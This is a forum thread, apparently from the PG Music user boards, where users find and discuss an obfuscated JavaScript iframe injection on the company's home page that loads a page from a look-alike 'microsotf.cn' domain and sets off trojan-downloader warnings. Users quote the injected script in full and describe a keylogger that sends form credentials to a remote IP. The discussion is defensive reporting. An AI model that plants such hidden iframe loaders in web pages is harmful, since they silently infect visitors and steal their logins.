Log in to post
|
Print Thread |
|
|
|
|
Off-Topic
|
Joined: Mar 2001
Posts: 8
Newbie
|
OP
Newbie
Joined: Mar 2001
Posts: 8 |
If you look at the source for the pgmusic.com home page, do you see the following line?:
<body ><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>
Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning.
Just curious if this is something happening on my end or if it's actually in the page itself.
Thanks.
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jun 2005
Posts: 235
Apprentice
|
Apprentice
Joined: Jun 2005
Posts: 235 |
yes i see it in the source.
are you the Grayson who works at PG?
DTuna
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Sep 2007
Posts: 3,926
Veteran
|
Veteran
Joined: Sep 2007
Posts: 3,926 |
When I read this from my Internet machine, I looked at the status of Avast!, my AV program. It was OFF. I don't even know how to do that. I am doing a Thorough Scan as I write. If there's something going on I'll have to reinstall an AV program on my DAW as I tend to stay logged into PG.
I have received several emails in the last few weeks under friends' names, but which were clearly the result of worms. All the messages have contained links to Chinese websites, most purporting to sell computers. I have gotten reports of illicit Chinese activity from other sources as well. To my mind, Chinese black-hat crackers (what folks erroneously call "hackers", who are really the white hats) are ve-ry busy these days. Make sure your AV programs are on and up to date.
R.
"My primary musical instrument is the personal computer."
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jul 2006
Posts: 40
Enthusiast
|
Enthusiast
Joined: Jul 2006
Posts: 40 |
"Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning."
I'm getting the same thing when I try to go to the PGMusic home page through my SBC Yahoo browser. When I use just the MS Explorer browser, it doesn't happen. BTW, I am using Avast and Spybot.
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,179
Veteran
|
Veteran
Joined: May 2000
Posts: 22,179 |
Yeah, Avast jumped right in as soon as looked at the homepage - needs attention! I hate those javascript redirectors - they can be anywhere in the code; sometimes in places that are not even suppose to get read (like between the head and body tags), which explains why some browsers are more susceptible than others... but regardless of browser the problem is there.
I do not work here, but the benefits are still awesome Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Apr 2008
Posts: 1,122
Expert
|
Expert
Joined: Apr 2008
Posts: 1,122 |
Avast caught mine right away when I went to the page this morning. Since then it has not come up again.
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jan 2006
Posts: 2,689
Veteran
|
Veteran
Joined: Jan 2006
Posts: 2,689 |
It didn't make a lot of sense on my part, but I checked the homepage out. Avast worked for me also with a malware warning.
Don S.
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Mar 2001
Posts: 8
Newbie
|
OP
Newbie
Joined: Mar 2001
Posts: 8 |
Thanks. I did send them email about it. Hopefully it'll get addressed ASAP.
BTW I don't work for PG Music, Mr Tuna.
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Apr 2007
Posts: 440
Journeyman
|
Journeyman
Joined: Apr 2007
Posts: 440 |
Hi I'm also getting a trojan virus warning from Kaspersky when opening up PGMusic homepage what does this mean and is it being looked at. The warning from Kaspersky is Trojan-Downloader.JS.Iframe.bjn
Brian Cadoret
Brian Cadoret BIAB 2025 Pro build 1125e with BIAB2023 UltraPAK . Samplitude Pro X4 Suite. Mixcraft 10.5 Pro Studio Focusrite 2i2 Scarlett Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz 3.20 GHz Installed RAM 8.00 GB
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,179
Veteran
|
Veteran
Joined: May 2000
Posts: 22,179 |
I have heard that ridding a site of these types of infections is a tough task and time consuming so I assume they'll need a little time to resolve it. I know of business sites that took a few weeks getting rid of it, only to get it again. Keep your AV updated. Use SpybotS&D too, as these redirectors hide from the Windows API and do not show up in antivirus scans or the running processes list. They can be tough to get rid of. Here's a description of one such javascript redirecor - After execution of e.g. 9129837.exe PWS.Small.bs installs a service (hide_evr2) and copies itself and the service file to the Windows directory. Additionally an autorun entry (ttool) is created which loads the 9129837.exe on every windows startup. The service affects that the two files and the autorun entry are hidden from the windows API, i.e. the user cannot see the files. If you visit webpages with forms like ebay or online banking pages the filled-in information like userid and password/pin are sent to http://81.95.147.107/cgi-bin/**** ADDITIONAL REMOVAL INSTRUCTION: Please reboot your PC in Safe Mode and perform another scan of Spybot - Search & Destroy to remove the remainings.Having unfamiliar proccesses running like the above mentioned "9129837.exe " is not a good sign..
I do not work here, but the benefits are still awesome Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Sep 2007
Posts: 3,926
Veteran
|
Veteran
Joined: Sep 2007
Posts: 3,926 |
My Avast! scan didn't show anything, but there was an info page somewhere that did list the 'microsotf.cn' thingie as an infection. More importantly, though, when I checked Avast! it was OFF again--not just that the scanners were disabled, but the program was not resident in memory. This is very concerning. I've started it again and will be keeping a close eye on it.
Edit: Followup: I can run a scan with Avast! but it does not run on Windows startup and will not stay in memory. I'm downloading AVG as I write.
So, we think this thing is a keystroke logger?
R.
"My primary musical instrument is the personal computer."
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jan 2006
Posts: 2,689
Veteran
|
Veteran
Joined: Jan 2006
Posts: 2,689 |
Richard,
I had the same problem with Avast a while back. I deleted and then reinstalled it. So far, so good.
Don S.
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,179
Veteran
|
Veteran
Joined: May 2000
Posts: 22,179 |
It is likely a keylogger - please go back and read my previous post - an antivirus will NOT find it use SPYBOT quickly
I would disconnect from internet, (you may have to be on internet to install Spybot Search and Destroy) then scan, then scan again in safe mode as per Spybot instructions.
It is *probably* taking keylogging info and sending to a site somewhere... that is the purpose of these types of trojans
I am NOT trying to cause widespread panic, but it is a serious threat when one of these gets in, I have first and second hand experience removing this for others. Tend to your machine, especially if you have banking accounts or access to other web sites thru FTP on that machine. If you watch when it first gets in you can see it connecting to .cn sites to update itself and start running... I tested a couple infected sites and closely watched the results. It gets into a web site through FTP by an infected admin, so all access should be closed and known clean backups used. Hopefully these exist on a source seperate from the main site.
A clean machine should also be used to reset all passwords for any admins to get access. Otherwise passwords are still held at the remote site for later reinfection. It's an ugly ugly situation once it gets in. I can list other sites infected right now, and have actually reported them to Google but they have not responded by associating a warning with these sites yet.
I do not work here, but the benefits are still awesome Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,179
Veteran
|
Veteran
Joined: May 2000
Posts: 22,179 |
As a side note - some versions are capable of adapting to the php used in forums, hopefully pgmusic is on top of this and the site is hosted seperately.
If PGMusic wants to check, look at the php script in the index.php files for added cryptic php code. It will not be easy to see using the 'view source' but will easy to see using the source codes on the server. Also trojans seems to like the 'include' folders and javascript folders. This, however is much more rare than the current version that is infecting sites.
I suggest keeping a copy of install files for Spybot and Antivirus on a drive somewhere. I have seen these types of trojans block access to Avast, McAfee and Symantec, and probably others..
just trying to help with what I have seen.
I do not work here, but the benefits are still awesome Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2005
Posts: 222
Apprentice
|
Apprentice
Joined: May 2005
Posts: 222 |
I'm running Linux and just safely saved the 25.8 KB malware download to disk. It's name is 955.pdf, so perhaps it it using an Acrobat exploit. I found another site that thinks their site was infected with it on 7/4. (http://olegvolk.livejournal.com/628779.html)
If anyone needs the internal contents of the file, let me know. I will keep it a few days before deleting the file. For those using AVG antivirus protection, I ran an AVG scan on the file and AVG passed it as being OK, so be careful.
By the way, I urge all of you to only use Linux for surfing the internet.
JBlatz
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,179
Veteran
|
Veteran
Joined: May 2000
Posts: 22,179 |
Linux is fine until you run into a virus designed to exploit Linux. There are just about as many security updates for Linux as there are for Windows these days.. depending on the brand of Linux you want to run.
I use Linux Live CD's to get into infected systems and repair sometimes, so I know it has benefits for trojans designed to exploit windows, but it is by no means completely safe.
I would be interested in viewing the file contents, but I'd need to access it on a safer machine. Besides, a lot of mail servers will indeed catch it and stop delivery, as a lot of them are running linux also! Congrats on outsmarting this one, and thanks for the extra efforts. Other sites with the infection include dademoldinspectors and enviropro.net... among hundreds of others. If you are interested in helping for these types of things, check out badwarebusters.org
I do not work here, but the benefits are still awesome Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 38,502
Veteran
|
Veteran
Joined: May 2000
Posts: 38,502 |
Has the pgmusic homepage been fixed?
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Jan 2002
Posts: 10,193
Veteran
|
Veteran
Joined: Jan 2002
Posts: 10,193 |
I used the Live Help to ask. This is the reply I got: "Jareth: Welcome to PG Music's live help. May we please have your first and last name to better assist you? you: HI, this is Gary Curran. Do you know if anyone has found and removed the virus loader program from the main web page yet? you: There is a thread in the Off Topic forum about it, several of us running Avast A/V have had Malware warnings about it. Jareth: I'm currently asking our webmaster Jareth: give me one moment you: thank you, Jareth.  Jareth: webmaster says there is a script and that it is likely not dangerous - the contents are currently being analyzed and we will inform everyone as soon as we have reached a conclusion you: okay. Thanks a lot. you: have a great day. Jareth: you're welcome, bye you: END CHAT Jareth: you too Gary
I'm blessed watching God do what He does best. I've had a few rough years, and I'm still not back to where I want to be, but I'm on the way and things are looking far better now than what they were!
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: May 2000
Posts: 22,179
Veteran
|
Veteran
Joined: May 2000
Posts: 22,179 |
JBlatz - what makes you think that the malware is called 955.pdf? That appears to be a valid program/ format. http://www.pdf995.com/What I saw was a downloader script - a couple different warnings actually.. when I went to the home page.
I do not work here, but the benefits are still awesome Make your sound your own!
|
|
|
|
|
|
|
|
|
|
|
|
Off-Topic
|
Joined: Apr 2007
Posts: 440
Journeyman
|
Journeyman
Joined: Apr 2007
Posts: 440 |
Hi Just visited the PGMusic homepage and Kaspersky is NOT giving me trojan warnings anymore , I hope this is a good sign.
Brian Cadoret
Brian Cadoret BIAB 2025 Pro build 1125e with BIAB2023 UltraPAK . Samplitude Pro X4 Suite. Mixcraft 10.5 Pro Studio Focusrite 2i2 Scarlett Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz 3.20 GHz Installed RAM 8.00 GB
|
|
|
|
|
|
|
|
|
|
|
|
Ask sales and support questions about Band-in-a-Box using natural language.
ChatPG's knowledge base includes the full Band-in-a-Box User Manual and sales information from the website.
|
|
|
|
|
|
|
|
|
|
|
New RealTracks Released with Band-in-a-Box 2025!
We’ve expanded the Band-in-a-Box® RealTracks library with 202 incredible new RealTracks (in sets 449-467) across Jazz, Blues, Funk, World, Pop, Rock, Country, Americana, and Praise & Worship—featuring your most requested styles!
Jazz, Blues & World (Sets 449–455):
These RealTracks includes “Soul Jazz” with Neil Swainson (bass), Mike Clark (drums), Charles Treadway (organ), Miles Black (piano), and Brent Mason (guitar). Enjoy “Requested ’60s” jazz, classic acoustic blues with Colin Linden, and more of our popular 2-handed piano soloing. Plus, a RealTracks first—Tango with bandoneon, recorded in Argentina!
Rock & Pop (Sets 456–461):
This collection includes Disco, slap bass ‘70s/‘80s pop, modern and ‘80s metal with Andy Wood, and a unique “Songwriter Potpourri” featuring Chinese folk instruments, piano, banjo, and more. You’ll also find a muted electric guitar style (a RealTracks first!) and “Producer Layered Guitar” styles for slick "produced" sound.
Country, Americana & Praise (Sets 462–467):
We’ve added new RealTracks across bro country, Americana, praise & worship, vintage country, and songwriter piano. Highlights include Brent Mason (electric guitar), Eddie Bayers (drums), Doug Jernigan (pedal steel), John Jarvis (piano), Glen Duncan (banjo, mandolin & fiddle), Mike Harrison (electric bass) and more—offering everything from modern sounds to heartfelt Americana styles
Check out all the 202 New RealTracks (in sets 456-467)
And, if you are looking for more, the 2025 49-PAK (for $49) includes an additional 20 RealTracks with exciting new sounds and genre-spanning styles. Enjoy RealTracks firsts like Chinese instruments (guzheng & dizi), the bandoneon in an authentic Argentine tango trio, and the classic “tic-tac” baritone guitar for vintage country.
You’ll also get slick ’80s metal guitar from Andy Wood, modern metal with guitarist Nico Santora, bass player Nick Schendzielos, and drummer Aaron Stechauner, more praise & worship, indie-folk, modern/bro country with Brent Mason, and “Songwriter Americana” with Johnny Hiland.
Plus, enjoy user-requested styles like Soul Jazz RealDrums, fast Celtic Strathspey guitar, and Chill Hop piano & drums!
The 2025 49-PAK is loaded with other great new add-ons as well. Learn more about the 2025 49-PAK!
Bonus PAKs for Band-in-a-Box 2025 for Mac!
With your version 2025 for Mac Pro, MegaPAK, UltraPAK, UltraPAK+, Audiophile Edition or PlusPAK purchase, we'll include a Bonus PAK full of great new Add-ons FREE! Or upgrade to the 2025 49-PAK for only $49 to receive even more NEW Add-ons including 20 additional RealTracks!
These PAKs are loaded with additional add-ons to supercharge your Band-in-a-Box®!
This Free Bonus PAK includes:
- The 2025 RealCombos Booster PAK:
-For Pro customers, this includes 33 new RealTracks and 65+ new RealStyles.
-For MegaPAK customers, this includes 29 new RealTracks and 45+ new RealStyles.
-For UltraPAK customers, this includes 20 new RealStyles.
- Look Ma! More MIDI 13: Country & Americana
- Instrumental Studies Set 22: 2-Hand Piano Soloing - Rhythm Changes
- MIDI SuperTracks Set 44: Jazz Piano
- Artist Performance Set 17: Songs with Vocals 7
- Playable RealTracks Set 4
- RealDrums Stems Set 7: Jazz with Mike Clark
- SynthMaster Sounds and Styles (with audio demos)
- 128 GM MIDI Patch Audio Demos.
Looking for more great add-ons, then upgrade to the 2025 49-PAK for just $49 and you'll get:
- 20 Bonus Unreleased RealTracks and RealDrums with 20 RealStyles,
- FLAC Files (lossless audio files) for the 20 Bonus Unreleased RealTracks and RealDrums
- Look Ma! More MIDI 14: SynthMaster,
- Instrumental Studies Set 23: More '80s Hard Rock Soloing,
- MIDI SuperTracks Set 45: More SynthMaster
- Artist Performance Set 18: Songs with Vocals 8
- RealDrums Stems Set 8: Pop, Funk & More with Jerry Roe
Learn more about the Bonus PAKs for Band-in-a-Box® 2025 for Mac®!
New! Xtra Styles PAK 20 for Band-in-a-Box 2025 and Higher for Mac!
Xtra Styles PAK 20 for Mac & Windows Band-in-a-Box version 2025 (and higher) is here with 200 brand new RealStyles!
We're excited to bring you our latest and greatest in the all new Xtra Styles PAK 20 for Band-in-a-Box! This fresh installment is packed with 200 all-new styles spanning the rock & pop, jazz, and country genres you've come to expect, as well as the exciting inclusion of electronic styles!
In this PAK you’ll discover: Minimalist Modern Funk, New Wave Synth Pop, Hard Bop Latin Groove, Gospel Country Shuffle, Cinematic Synthwave, '60s Motown, Funky Lo-Fi Bossa, Heavy 1980s Metal, Soft Muted 12-8 Folk, J-Pop Jazz Fusion, and many more!
All the Xtra Styles PAKs 1 - 20 are on special for only $29 each (reg $49), or get all 209 PAKs for $199 (reg $399)! Order now!
Learn more and listen to demos of the Xtra Styles PAK 20.
Video: Xtra Styles PAK 20 Overview & Styles Demos: Watch now!
Note: The Xtra Styles require the UltraPAK, UltraPAK+, or Audiophile Edition of Band-in-a-Box®. (Xtra Styles PAK 20 requires the 2025 or higher UltraPAK, UltraPAK+, or Audiophile Edition. They will not work with the Pro or MegaPAK version because they need the RealTracks from the UltraPAK, UltraPAK+, or Audiophile Edition.
New! XPro Styles PAK 9 for Band-in-a-Box 2025 and higher for Mac!
We've just released XPro Styles PAK 9 for Mac & Windows Band-in-a-Box version 2025 (and higher) with 100 brand new RealStyles, plus 29 RealTracks/RealDrums!
We've been hard at it to bring you the latest and greatest in this 9th installment of our popular XPro Styles PAK series! Included are 75 styles spanning the rock & pop, jazz, and country genres (25 styles each) that fans have come to expect, as well as 25 styles in this volume's wildcard genre: funk & R&B!
If you're itching to get a sneak peek at what's included in XPro Styles PAK 9, here is a small helping of what you can look forward to: Funky R&B Horns, Upbeat Celtic Rock, Jazz Fusion Salsa, Gentle Indie Folk, Cool '60s Soul, Funky '70s R&B, Smooth Jazz Hip Hop, Acoustic Rockabilly Swing, Funky Reggae Dub, Dreamy Retro Latin Jazz, Retro Soul-Rock Fusion, and much more!
Special Pricing! Until July 31, 2024, all the XPro Styles PAKs 1 - 9 are on sale for only $29 ea (Reg. $49 ea), or get them all in the XPro Styles PAK Bundle for only $149 (reg. $299)! Order now!
Learn more and listen to demos of XPro Styles PAKs.
Video: XPro Styles PAK 9 Overview & Styles Demos: Watch now!
XPro Styles PAKs require Band-in-a-Box® 2025 or higher and are compatible with ANY package, including the Pro, MegaPAK, UltraPAK, UltraPAK+, and Audiophile Edition.
New! Xtra Styles PAK 20 for Band-in-a-Box 2025 and Higher for Windows!
Xtra Styles PAK 20 for Windows & Mac Band-in-a-Box version 2025 (and higher) is here with 200 brand new RealStyles!
We're excited to bring you our latest and greatest in the all new Xtra Styles PAK 20 for Band-in-a-Box! This fresh installment is packed with 200 all-new styles spanning the rock & pop, jazz, and country genres you've come to expect, as well as the exciting inclusion of electronic styles!
In this PAK you’ll discover: Minimalist Modern Funk, New Wave Synth Pop, Hard Bop Latin Groove, Gospel Country Shuffle, Cinematic Synthwave, '60s Motown, Funky Lo-Fi Bossa, Heavy 1980s Metal, Soft Muted 12-8 Folk, J-Pop Jazz Fusion, and many more!
All the Xtra Styles PAKs 1 - 20 are on special for only $29 each (reg $49), or get all 209 PAKs for $199 (reg $399)! Order now!
Learn more and listen to demos of the Xtra Styles PAK 20.
Video: Xtra Styles PAK 20 Overview & Styles Demos: Watch now!
Note: The Xtra Styles require the UltraPAK, UltraPAK+, or Audiophile Edition of Band-in-a-Box®. (Xtra Styles PAK 20 requires the 2025 or higher UltraPAK, UltraPAK+, or Audiophile Edition. They will not work with the Pro or MegaPAK version because they need the RealTracks from the UltraPAK, UltraPAK+, or Audiophile Edition.
New! XPro Styles PAK 9 for Band-in-a-Box 2025 and higher for Windows!
We've just released XPro Styles PAK 9 for Windows & Mac Band-in-a-Box version 2025 (and higher) with 100 brand new RealStyles, plus 29 RealTracks/RealDrums!
We've been hard at it to bring you the latest and greatest in this 9th installment of our popular XPro Styles PAK series! Included are 75 styles spanning the rock & pop, jazz, and country genres (25 styles each) that fans have come to expect, as well as 25 styles in this volume's wildcard genre: funk & R&B!
If you're itching to get a sneak peek at what's included in XPro Styles PAK 9, here is a small helping of what you can look forward to: Funky R&B Horns, Upbeat Celtic Rock, Jazz Fusion Salsa, Gentle Indie Folk, Cool '60s Soul, Funky '70s R&B, Smooth Jazz Hip Hop, Acoustic Rockabilly Swing, Funky Reggae Dub, Dreamy Retro Latin Jazz, Retro Soul-Rock Fusion, and much more!
Special Pricing! Until July 31, 2024, all the XPro Styles PAKs 1 - 9 are on sale for only $29 ea (Reg. $49 ea), or get them all in the XPro Styles PAK Bundle for only $149 (reg. $299)! Order now!
Learn more and listen to demos of XPro Styles PAKs.
Video: XPro Styles PAK 9 Overview & Styles Demos: Watch now!
XPro Styles PAKs require Band-in-a-Box® 2025 or higher and are compatible with ANY package, including the Pro, MegaPAK, UltraPAK, UltraPAK+, and Audiophile Edition.
Video: Band-in-a-Box® 2025 for Mac®: VST3 Plugin Support
Band-in-a-Box® 2025 for Mac® now includes support for VST3 plugins, alongside VST and AU. Use them with MIDI or audio tracks for even more creative possibilities in your music production.
Band-in-a-Box® 2025 for Macs®: VST3 Plugin Support
Video: Band-in-a-Box® 2025 for Mac®: Using VST3 Plugins
Join the conversation on our forum.
|
|
|
|
|
|
|
|
|
|
|
Forums58
Topics84,407
Posts778,815
Members39,650
|
Most Online25,754 Jan 24th, 2025
|
|
|
|
|
|
|
|
|